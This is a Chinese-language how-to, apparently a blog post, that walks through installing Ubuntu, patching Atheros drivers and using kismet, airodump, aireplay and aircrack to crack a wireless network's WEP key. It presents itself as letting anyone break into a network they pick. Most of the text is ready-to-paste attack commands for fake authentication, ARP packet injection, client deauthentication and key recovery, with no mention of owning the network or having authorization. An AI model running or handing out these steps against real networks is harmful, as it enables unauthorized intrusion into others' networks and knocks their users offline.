看了這篇文章,任何人都可以安裝和運行Linux,并破解WEP密鑰。我一共花了整整兩天,并閱讀了大量資料才做出這個東西,現(xiàn)在拿出來和大家分享。我不是Linux方面的專家。你所需要的就是一個有無線網(wǎng)卡的舊筆記本和一份Ubuntu Linux的拷貝,這是目前最流行并且最易于安裝的Linux發(fā)行版本之一。
第一步,很顯然,是安裝Ubuntu。從CD啟動,按指示操作,非常簡單。要注意的是,接下來的每一步都要有序進行,否則就達不到預期目標。
下一步是安裝其它程序。首先要保證你的本本可以聯(lián)網(wǎng)。安裝其它程序,需要打開一個終端窗口,并鍵入如下代碼:
sudo cp /etc/apt/sources.list /etc/apt/sources.list_backup sudo gedit /etc/apt/sources.list |
在編輯器中,用以下代碼代替其它東西:
## Add comments (##) in front of any line to remove it from being checked. ## Use the following sources.list at your own risk. deb http://archive.ubuntu.com/ubuntu dapper main restricted universe multiverse deb-src http://archive.ubuntu.com/ubuntu dapper main restricted universe multiverse ## MAJOR BUG FIX UPDATES produced after the final release deb http://archive.ubuntu.com/ubuntu dapper-updates main restricted universe multiverse deb-src http://archive.ubuntu.com/ubuntu dapper-updates main restricted universe multiverse ## UBUNTU SECURITY UPDATES deb http://security.ubuntu.com/ubuntu dapper-security main restricted universe multiverse deb-src http://security.ubuntu.com/ubuntu dapper-security main restricted universe multiverse ## BACKPORTS REPOSITORY (Unsupported. May contain illegal packages. Use at own risk.) deb http://archive.ubuntu.com/ubuntu dapper-backports main restricted universe multiverse deb-src http://archive.ubuntu.com/ubuntu dapper-backports main restricted universe multiverse ## PLF REPOSITORY (Unsupported. May contain illegal packages. Use at own risk.) deb http://packages.freecontrib.org/ubuntu/plf dapper free non-free deb-src http://packages.freecontrib.org/ubuntu/plf dapper free non-free |
保存文件、退出編輯器。敲入如下命令:
sudo apt-get update |
現(xiàn)在我們可以安裝后續(xù)將會用到的包了:
sudo apt-get install build-essential sudo apt-get install aircrack sudo apt-get install kismet sudo apt-get install airsnort sudo apt-get install linux-source sudo apt-get install linux-headers sudo apt-get install sharutils |
接下來你應該更新整個系統(tǒng),方法是,進入系統(tǒng)菜單——>Administration——>Update Manager。單擊“Check”,開始安裝更新。然后重啟系統(tǒng)。完成后,為Madwifi驅(qū)動打補丁。
這個地方可能會有點復雜。我的無線網(wǎng)卡(Linksys WPC55AG)用的是Atheros驅(qū)動,我需要對之打補丁。如果你的驅(qū)動和我的不同,你需要研究一下是否需要為驅(qū)動打補丁,是否甚至可以和Aircrack套件協(xié)同工作。Aircrack-ng.org的論壇是一個用來測試的好地方,當然了,google search也是的。如果你的網(wǎng)卡也是Atheros的,我們稱之為ath0,那么,在終端窗口敲入iwconfig,會出現(xiàn)一行字符,顯示以太網(wǎng)控制器是Atheros Communications……
我們來打補丁。當發(fā)現(xiàn)硬盤舊的驅(qū)動時,會暫時讓你的無線網(wǎng)卡無法工作。先進入/usr/src目錄,下載新的驅(qū)動、刪掉老驅(qū)動,然后安裝新驅(qū)動,并打上補丁。你可以把以下代碼拷貝粘貼到終端:
sudo -i cd /usr/src wget http://syserr.com/stuff/madwifi-cvs-20051025.tar.gz wget http://syserr.com/stuff/madwifi-cvs-20051025.patch ifconfig ath0 down rmmod ath_rate_sample wlan_wep ath_rate_onoe ath_pci wlan ath_hal find /lib/modules -name ‘a(chǎn)th*’ -exec rm -v {} \; find /lib/modules -name ‘wlan*’ -exec rm -v {} \; tar zxvf madwifi-cvs-20051025.tar.gz cd madwifi patch -Np1 -i ../madwifi-cvs-20051025.patch make && make install modprobe ath_pci |
如果你用的是Atheros驅(qū)動,接下來我們舊需要配置kismet了。如果你用的是其它驅(qū)動,就必須看你所使用的語法。首先進入Kismet配置,然后改變源代碼行。
sudo gedit /etc/kismet/kismet.conf |
把以“source=”打頭的代碼行變?yōu)椤皊ource=madwifi_ag,ath0,madwifi”,重啟計算機。重啟后你將可以通過無線網(wǎng)卡訪問英特網(wǎng)。
現(xiàn)在我們開始破解。打開一個終端窗口,進入監(jiān)控模式,運行ksimet。
sudo airmon start ath0 sudo kismet |
找到你想要破解的無線網(wǎng)絡,需要注意其ESSID和通道,然后敲Ctrl-C退出。
接下來運行airodump。
sudo airodump ath0 filename channel# 1 |
文件名隨你意,可以作為ivs文件存在你的home目錄下,或者存在你運行命令的任何目錄下。
從airodump中拷貝無線網(wǎng)絡的bssid,具體做法是選中后敲Shift+Ctrl+C。打開一個新的終端窗口,以便我們可以運行aireplay,開始注入數(shù)據(jù)包,導致數(shù)據(jù)量上升。我們想要airodump中的數(shù)據(jù)欄顯示在10萬到40萬之間。數(shù)據(jù)包越多,aircrack就可以越快地找到WEP密鑰。如果WEP密鑰是128位的,我們可能需要多達100萬個數(shù)據(jù)包。
sudo aireplay -1 0 -e ESSID -a BSSID -h 0:1:2:3:4:5 ath0 |
應該把網(wǎng)絡和無線連接聯(lián)系起來。如果總是超時,你需要離無線路由器更近,或通過“sudo iwconfig ath0 rate 1M”改變接口速率。
接下來我們想開始注入數(shù)據(jù)包。
sudo aireplay -3 -b BSSID -h 0:1:2:3:4:5 ath0 |
起初只是讀取數(shù)據(jù)包,并且報告0個ARP請求、發(fā)送0個數(shù)據(jù)包。只需要等一兩分鐘,就會開始大量發(fā)送數(shù)據(jù)包了。如果返回文本,并報告說已經(jīng)被削弱了,那么敲Ctrl+C,重新運行命令??梢酝ㄟ^敲入下面這條命令來加速任何事情:
sudo aireplay -0 ath0 -a BSSID ath0 |
否則就只坐等事情慢慢進行吧。隨著數(shù)據(jù)包開始被發(fā)送,Airodump中的數(shù)據(jù)欄就開始飆升。等到收到了預期數(shù)量的數(shù)據(jù)包,打開一個新的終端窗口,運行aircrack。
sudo aircrack filename.ivs |
一分鐘后,aircrack應該返回WEP密鑰。如果沒有返回,那就繼續(xù)回收更多的數(shù)據(jù)包。
這做起來一點都不費勁,但可以起作用。